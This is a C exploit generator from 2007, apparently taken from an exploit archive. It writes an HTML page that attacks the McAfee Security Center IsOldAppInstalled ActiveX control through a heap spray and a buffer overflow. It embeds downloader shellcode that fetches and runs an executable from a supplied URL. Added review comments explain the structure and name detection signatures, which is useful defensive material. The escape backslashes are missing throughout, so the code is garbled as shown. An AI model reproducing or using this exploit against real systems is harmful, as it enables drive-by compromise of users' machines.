
# Title : McAfee Security Center IsOldAppInstalled ActiveX BoF Exploit
# Published : 2007-05-10
# Author : Jambalaya


/*
	McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability
	
	Peel the frame from axis,Thanks
	
	Tested on Windows 2000 with Mcsubmgr.dll version 6.0.0.15

	Greetz to OYXin, sowhat, Winny Thomas and 0x557 team
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// File-scope state shared between main() and PrintPayLoad().
FILE *fp = NULL;                      // generated HTML output; opened in main(), also written by PrintPayLoad()
char *file = "McAfee_exploit.html";   // output path; replaced by argv[2] when given (never modified in place)
char *url = NULL;                     // argv[1]; appended verbatim after the shellcode bytes in main()

// Downloader shellcode: raw machine-code bytes as a hex-escaped string.
// main() copies these bytes into a buffer, appends the download URL and
// then the single byte sc_2, and PrintPayLoad() emits the result as
// JavaScript %uXXXX escapes inside the generated page's heap spray.
// From a detection standpoint, this byte sequence, the %u0505 spray
// pattern in `footer` and the CLSID in `header` are the static
// signatures of the file this tool produces.
// NOTE(review): as rendered here the escape sequences have lost their
// backslashes, so the array does not compile as shown.
unsigned char sc[] = 
"xEBx10x5Bx4Bx33xC9x66xB9x3cx01x80x34x0Bx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFFx70x34x99x99x99xC3x12x6BxAA"
"x59x35xA4x01x99x99x99xECx6Fx18x75x51x99x99x99x12"
"x6Dx10xCFxBDx71x0Cx99x99x99xAAx42x10x9Fx66xAFxF1"
"x17xD7x97x75x71x34x99x99x99x10xDFx91xF1xF5xF5x99"
"x99xF1xF6xF7xB7xFDxF1xECxEBxF5xF4xCDx66xCFx91x10"
"xDFx9Dx66xAFxF1xE7x41x7BxEAx71x11x99x99x99x10xDF"
"x95x66xAFxF1x01x67x13x97x71xE0x99x99x99x10xDFx8D"
"x66xAFxF1xBCx29x66x5Bx71xF3x99x99x99x10xDFx81x66"
"xEFx9DxF1xAFx83xB6xE9x71xC3x99x99x99x10xDFx89xF3"
"xFCxF1xEAxB7xFCxE1x10xFFx85x66xEFx85x66xCFx81xAA"
"x50xC8xC8x66xEFx85x66xEFxBDxC8x66xCFx89xAAx50xC8"
"x66xEFx85x66xCFx8Dx66xCFx95x70x19x99x99x99xCCxCF"
"xFDx38xA9x99x99x99x1Cx59xE1x95x12xD9x95x12xE9x85"
"x34x12xF1x91x72x90x12xD9xADx12x31x21x99x99x99x12"
"x5CxC7xC4x5Bx9Dx99xCAxCCxCFxCEx12xF5xBDx81x12xDC"
"xA5x12xCDx9CxE1x9Ax4Cx12xD3x81x12xC3xB9x9Ax44x7A"
"xABxD0x12xADx12x9Ax6CxAAx66x65xAAx59x35xA3x5DxED"
"x9Ex58x56x94x9Ax61x72x6BxA2xE5xBDx8DxECx78x12xC3"
"xBDx9Ax44xFFx12x95xD2x12xC3x85x9Ax44x12x9Dx12x9A"
"x5Cx72x9BxAAx59x12x4CxC6xC7xC4xC2x5Bx9Dx99x71x50"
"x67x66x66";
// Single byte copied after the URL in main() (memcpy of exactly 1 byte);
// presumably it terminates the URL string for the shellcode -- not verifiable here.
unsigned char sc_2[] = "x98";

// First part of the generated HTML page. It instantiates the McAfee
// Security Center control by CLSID (element id 'target'), opens a
// <script> block, sets the spray target address 0x05050505 and begins
// the `shellcode` string with two %u9090 units. The unescape("...") call
// is deliberately left open: PrintPayLoad() appends the %u-encoded payload
// and emits the closing quote and ");".
// The CLSID literal below is the most reliable static indicator for
// pages produced by this generator.
// NOTE(review): the inner double quotes and the newline/tab escapes have
// lost their backslashes in this rendering, so the literal does not
// compile as shown.
char * header =
"<!-- McAfee exploit:) Jambalaya-->nn"

"<html>n"
"<object classid="clsid:9BE8D7B2-329C-442A-A4AC-ABA9D7572602" id='target'></object>n"
"<body>n"
"<SCRIPT language="javascript">n"
"tvar heapSprayToAddress = 0x05050505;n"
"tvar shellcode = unescape("%u9090"+"%u9090"+ n";




// Second part of the generated page: heap spray plus the call that
// triggers the overflow.
//  - heapBlockSize is 0x400000; each block is a slide of %u0505 units
//    (getSpraySlide) sized so that slide + shellcode fills the block;
//    heapBlocks = (0x05050505 - 0x400000) / heapBlockSize blocks are
//    stored in `memory[]`.
//  - `str` is 500 characters of 0x05 and is passed as the first argument
//    of target.IsOldAppInstalled(); the second argument is the literal
//    "defaultV".
// The %u0505 slide and the 500-byte 0x05 string are the behavioural
// markers a sandbox or script-content scanner would key on.
// NOTE(review): escape backslashes are missing in this rendering, so the
// literal does not compile as shown.
char * footer =
"n"
"var heapBlockSize = 0x400000;n" 
"var payLoadSize = shellcode.length * 2;n"
"var spraySlideSize = heapBlockSize - (payLoadSize+0x38);n"
"var spraySlide = unescape("%u0505%u0505");n"
"spraySlide = getSpraySlide(spraySlide,spraySlideSize);n"
"heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;n"
"memory = new Array();nn"
"for (i=0;i<heapBlocks;i++)n{n"
"ttmemory[i] = spraySlide + shellcode;n}n"

"var padding = String.fromCharCode(0x05);n"
"while( padding.length< 500)n"
"{npadding +=padding;n}n"
"var str = padding.substring(0,500);n"
"var arg2="defaultV";n"
"target.IsOldAppInstalled(str, arg2);n" 

"function getSpraySlide(spraySlide, spraySlideSize)n{nt"
"while (spraySlide.length*2<spraySlideSize)nt"
"{nttspraySlide += spraySlide;nt}n"
"tspraySlide = spraySlide.substring(0,spraySlideSize/2);ntreturn spraySlide;n}nn"
"</script>n";



// Closing tags written last; the page contains nothing after the script.
// NOTE(review): escape backslashes are missing in this rendering.
char * trigger_1 =
"</body>n"
"</html>n";


// Emit `buffsize` bytes of lpBuff as JavaScript %uXXXX escapes, one
// 16-bit unit (host byte order) per escape, to both stdout and the global
// output file `fp`. Every 16 bytes the current string literal is closed
// and a new one opened with `+`, and the final call closes the
// unescape("...") expression that `header` left open.
//
// lpBuff:   payload bytes (shellcode + URL + sc_2, assembled in main())
// buffsize: byte count; an odd count reads one byte past the end, which
//           stays inside main()'s zero-filled 1024-byte buf but is fragile
//
// NOTE(review): reading through (unsigned short *) on a char buffer is a
// strict-aliasing / alignment concern in standard C; the code relies on
// x86 tolerance. `fp` must be open before this is called.
// NOTE(review): the string literals here have lost their escape
// backslashes in this rendering and do not compile as shown.
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
for(i=0;i<buffsize;i+=2)
{
// Start a new JavaScript string literal every 16 bytes (8 units).
if((i%16)==0)
{
if(i!=0)
{
// Close the current literal and open the next one joined with '+'.
printf(""n"");
fprintf(fp, "%s", "" +n"");
}
else
{
// First literal: only the opening quote.
printf(""");
fprintf(fp, "%s", """);
}
}

// One 16-bit unit -> %uXXXX (zero-padded to four hex digits).
printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);

fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}

// Close the last literal and the unescape(...) call opened in `header`.
printf("";n");
fprintf(fp, "%s", "");n"); 


fflush(fp);
}




// Entry point: validates argv[1] as the download URL, opens the output
// HTML file (argv[2] or the default in `file`), and writes header, the
// %u-encoded payload (shellcode + URL + sc_2), footer and trigger_1.
//
// NOTE(review): `void main` is non-standard; `int main` with an exit
// status is the portable form.
// NOTE(review): `buf` is 1024 bytes but the URL from argv[1] is copied
// with memcpy(strlen(url)) after roughly sizeof(sc) bytes with no length
// check, so a long URL overflows the tool's own stack buffer. A bound of
// the form `strlen(url) + sizeof(sc) + 1 > sizeof(buf)` should reject it.
// NOTE(review): strstr() accepts "http://" / "ftp://" anywhere in the
// string, not only as a prefix, although the error message says "start".
// NOTE(review): `fp` is never fclose()d; the stream is flushed explicitly
// after each write and again at process exit.
void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};

int sc_len = 0;
int n;


if (argc < 2)
{
	printf("#######################################n");
	printf("#tMcAfee Security Center IsOldAppInstalled exploit by Jambalaya:>n");
	printf("#ttest on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15:>n");
	printf("#tReference : http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/054183.htmln");
	printf("#t100%% successful? who knows;)n");
	printf("rnUsage: %s <URL> [htmlfile]n", argv[0]);
	printf("rnE.g.: %s http://www.fakename.com/hello.exe exploit.htmlrnn", argv[0]);
exit(1);
}

url = argv[1];


// Scheme check is a substring test, and the minimum length is 10 bytes.
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
{
printf("[-] Invalid url. Must start with 'http://','ftp://'n");
return; 
}

printf("[+] download url:%sn", url);

// Optional second argument overrides the default output file name.
if(argc >=3) file = argv[2];
printf("[+] exploit file:%sn", file);

fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!n");
return;
} 


//build evil html file
fprintf(fp, "%s", header);
fflush(fp);

// Assemble payload: shellcode bytes (without the literal's NUL), then the
// URL (without NUL), then the single byte sc_2. No bound on strlen(url).
memset(buf, 0, sizeof(buf));
sc_len = sizeof(sc)-1;
memcpy(buf, sc, sc_len);
memcpy(buf+sc_len, url, strlen(url));

sc_len += strlen(url);

memcpy(buf+sc_len, sc_2, 1);
sc_len += 1;

// Writes the %u-encoded payload into the still-open unescape("...") call.
PrintPayLoad((char *)buf, sc_len);

fprintf(fp, "%s", footer);
fflush(fp); 

fprintf(fp, "%s", trigger_1);
fflush(fp); 


printf("[+] exploit write to %s success!n", file);
}

// www.Syue.com [2007-05-10]